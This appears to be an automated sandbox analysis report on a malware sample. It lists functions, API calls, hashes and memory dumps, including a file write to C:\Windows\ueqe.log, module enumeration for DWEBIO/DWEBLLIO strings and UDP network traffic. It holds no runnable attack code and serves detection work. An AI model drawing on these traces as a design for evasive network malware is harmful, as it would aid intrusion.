                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F5192B1D001198BEB24EB24CC49BEAB775AFA8704F0441DAD609A7264D7B5AF81CF91
                                                                                                                                                                                                                                                                                            Function 01442B8E Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 174stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01432490), ref: 01442C53
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 01442D24
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DFC), ref: 01442D86
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433E00), ref: 01442D98
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433E04), ref: 01442DC1
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,%s,01443658,?,?,?,?,?,?), ref: 01442DD7
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442A35: lstrlen.KERNEL32(00000000), ref: 01442A4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DE0), ref: 01442A7C
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DE4), ref: 01442AA2
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DE8), ref: 01442AB1
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442A35: lstrlen.KERNEL32(00000000), ref: 01442B0C
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DEC), ref: 01442B40
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DF0), ref: 01442B66
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrlen$ExchangeInterlockedlstrcpy
                                                                                                                                                                                                                                                                                            • String ID: %s
                                                                                                                                                                                                                                                                                            • API String ID: 3361872186-3043279178
                                                                                                                                                                                                                                                                                            • Opcode ID: 0eea915f41d775d551cac3e56a39c126ad8030fb6ab27357af0c572f09b08287
                                                                                                                                                                                                                                                                                            • Instruction ID: 291df30de3c22e550716bf220d765ca3c7cb205c61511d74bac48080f0a7498e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eea915f41d775d551cac3e56a39c126ad8030fb6ab27357af0c572f09b08287
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38611AB5E001099BDB24DF65E841BEE77B1EFAC300F10817AE609D32A0DB749A55CF90
                                                                                                                                                                                                                                                                                            Function 014354A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76filestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(C:\Windows\ueqe.log,40000000,00000002,00000000,00000004,00000080,00000000,?), ref: 01435507
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,C:\Windows\ueqe.log), ref: 0143553A
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0143554E
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,01436958,00000000,?,00000000), ref: 01435599
                                                                                                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(000000FF), ref: 014355A6
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 014355B3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                            • String ID: C:\Windows\ueqe.log
                                                                                                                                                                                                                                                                                            • API String ID: 3630773104-2585761192
                                                                                                                                                                                                                                                                                            • Opcode ID: 52fe99997b39023a49f0f80a6e8d27b0748ca9ed4cb2270fca5806df98d96977
                                                                                                                                                                                                                                                                                            • Instruction ID: a038e80f7c7a336d4c8664b8459281ee91bf667cb91e0c82ec9abaeb6ec36c8d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52fe99997b39023a49f0f80a6e8d27b0748ca9ed4cb2270fca5806df98d96977
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD3171B5900318ABDB20DB64DC4DFDAB778AB58700F0046D9E719A7291DBB46A84CF90
                                                                                                                                                                                                                                                                                            Function 01439B56 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?), ref: 01439BA2
                                                                                                                                                                                                                                                                                            • Module32First.KERNEL32(?,00000224), ref: 01439BC5
                                                                                                                                                                                                                                                                                            • CharUpperA.USER32(?,00000008,?,?), ref: 01439BDE
                                                                                                                                                                                                                                                                                            • Module32Next.KERNEL32(?,00000224), ref: 01439C2E
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000008,?,?), ref: 01439C3E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Module32$CharCloseCreateFirstHandleNextSnapshotToolhelp32Upper
                                                                                                                                                                                                                                                                                            • String ID: DWEBIO$DWEBLLIO
                                                                                                                                                                                                                                                                                            • API String ID: 3788218250-3981995823
                                                                                                                                                                                                                                                                                            • Opcode ID: fabb84534136f028f67f7d2bcb25c7bcb0f9777f6fa3d0694266e28bf1e9eb65
                                                                                                                                                                                                                                                                                            • Instruction ID: 3a2ca1f2d6b0aab9d34a568d0bc97633112b93e5784bb26da49496e6f8705ef3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fabb84534136f028f67f7d2bcb25c7bcb0f9777f6fa3d0694266e28bf1e9eb65
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0219971900219ABEF20DBA5DC487DAB7F8AB5C304F0045DAE608A2250DB75DA85CF50
                                                                                                                                                                                                                                                                                            Function 0143777D Relevance: 12.2, APIs: 8, Instructions: 237networkthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • htons.WS2_32(?), ref: 0143785A
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: socket.WS2_32(00000002,00000002,00000011), ref: 01437203
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0143726D
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01437345
                                                                                                                                                                                                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 014378CA
                                                                                                                                                                                                                                                                                            • htons.WS2_32(?), ref: 014378E2
                                                                                                                                                                                                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01437940
                                                                                                                                                                                                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 014379DC
                                                                                                                                                                                                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01437A19
                                                                                                                                                                                                                                                                                              • Part of subcall function 01436330: RtlEnterCriticalSection.NTDLL(01449050), ref: 014363CD
                                                                                                                                                                                                                                                                                              • Part of subcall function 01436330: RtlLeaveCriticalSection.NTDLL(01449050), ref: 01436960
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01437A23
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01437A2B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: sendto$CriticalSectionhtons$EnterExitFreeGlobalLeaveThreadUserselectsocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4130859867-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6600f0b7192b2e9ec62fd247a9e683ac2b6b6a4853a4bd9b2c5bf9d7e86320ce
                                                                                                                                                                                                                                                                                            • Instruction ID: dbb3fe084065a26b818b4a35e9ea701d1d8a9e5a108e5e10beb38e83ab2d3452
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6600f0b7192b2e9ec62fd247a9e683ac2b6b6a4853a4bd9b2c5bf9d7e86320ce
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F39191B1E00209BBEB14DBA4C885FEFF7B5EF8C701F148599E615AB291D7719A40CB50
                                                                                                                                                                                                                                                                                            Function 01442C88 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 95stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 01442D24
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DFC), ref: 01442D86
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433E00), ref: 01442D98
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433E04), ref: 01442DC1
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,%s,01443658,?,?,?,?,?,?), ref: 01442DD7
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01442DE5
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00000000), ref: 01442DF9
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcat$ExchangeInterlockedlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: %s
                                                                                                                                                                                                                                                                                            • API String ID: 3923932729-3043279178
                                                                                                                                                                                                                                                                                            • Opcode ID: 7921f2b51d346a6e7a4410acf44e6ec8b5e56c4c9c498cc793e5e8f6e0406534
                                                                                                                                                                                                                                                                                            • Instruction ID: bf842e825c283e599dca7d100a3b6fa87641fd56a53e3e7756f24cb0d76ab024
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7921f2b51d346a6e7a4410acf44e6ec8b5e56c4c9c498cc793e5e8f6e0406534
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D3135B6E001189BD728DF65EC45BE97372AFAC300F1085BAF209D2160DB749A95CFA0
                                                                                                                                                                                                                                                                                            Function 0143A677 Relevance: 12.1, APIs: 8, Instructions: 74stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0143A6E6
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,014326B8,00000000), ref: 0143A6F8
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0143A704
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0143A6C5
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0143A70F
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0143A730
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,014326B0,00000000), ref: 0143A742
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0143A74E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountTick$lstrlenwsprintf$ExchangeInterlocked
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2702386088-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b36a9ef4d40acc4ed1ca016729689a58c38697bd98e2edebf13578094bd68089
                                                                                                                                                                                                                                                                                            • Instruction ID: e1c52bdc5b8a73af6327ffaff8c8a7821a933260bec9c12151c1ccdbbd4d99ee
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b36a9ef4d40acc4ed1ca016729689a58c38697bd98e2edebf13578094bd68089
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1021D8766001056BD7249B75DC48EF677A9EF9D641B044529FF09C3364D635D800CBA0
                                                                                                                                                                                                                                                                                            Function 0143A75A Relevance: 12.1, APIs: 8, Instructions: 72stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000080,?,?), ref: 0143A78C
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 0143A796
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01433CC0), ref: 0143A7B2
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 0143A7CF
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,01432880,?), ref: 0143A7FD
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0143A809
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,0143288C,?), ref: 0143A826
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0143A832
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$wsprintf$PathTemplstrcatlstrcpy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2776683041-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a867369551eeba0368438df598bf981885676acdc0023b042cef3513b10a3521
                                                                                                                                                                                                                                                                                            • Instruction ID: 6a5fa851e9486ae353b8b4b09cc47cc7fcc857ccc90565785fe4b9bfb39533d8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a867369551eeba0368438df598bf981885676acdc0023b042cef3513b10a3521
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 502198B9600104AFD714CF78D884BEA7B79AF9DB00F008159FF4987254DB74D984CB90
                                                                                                                                                                                                                                                                                            Function 01436EBE Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 01436F1C
                                                                                                                                                                                                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01436F7A
                                                                                                                                                                                                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 01437052
                                                                                                                                                                                                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 01437081
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 01437185
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 1c159393267ff6622bacc2514d092b9394eda45dcecc9c36675cb09f7ae1bce0
                                                                                                                                                                                                                                                                                            • Instruction ID: 43843e462447cfcf129c27e73463c728c6bb69ecf51c5c7ead543433eb3544f8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c159393267ff6622bacc2514d092b9394eda45dcecc9c36675cb09f7ae1bce0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39718EB1D042699AEF38CB24CC54BEAB775AB88341F5041EAE39DA6294D7B05AC48F40
                                                                                                                                                                                                                                                                                            Function 01437523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 01437580
                                                                                                                                                                                                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 014375D1
                                                                                                                                                                                                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,0000001E), ref: 014376A9
                                                                                                                                                                                                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 014376D8
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 01437768
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 8a011f380b1d3a1d66dd0a40033e44721d812b046b891a66aeddece095056292
                                                                                                                                                                                                                                                                                            • Instruction ID: f973c6d2e6ffb4ed81daa0b389c36d1a9a7cc5aaf6ec5b80f634db7e472ed96b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a011f380b1d3a1d66dd0a40033e44721d812b046b891a66aeddece095056292
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 145162B4D042689BEB39CB14CC54BE9B7B5AB89311F5081DAE39DA6290C7B06EC4DF40
                                                                                                                                                                                                                                                                                            Function 01442A35 Relevance: 10.1, APIs: 8, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01442A4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DE0), ref: 01442A7C
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DE4), ref: 01442AA2
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DE8), ref: 01442AB1
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01442B0C
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DEC), ref: 01442B40
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DF0), ref: 01442B66
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DF4), ref: 01442B83
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
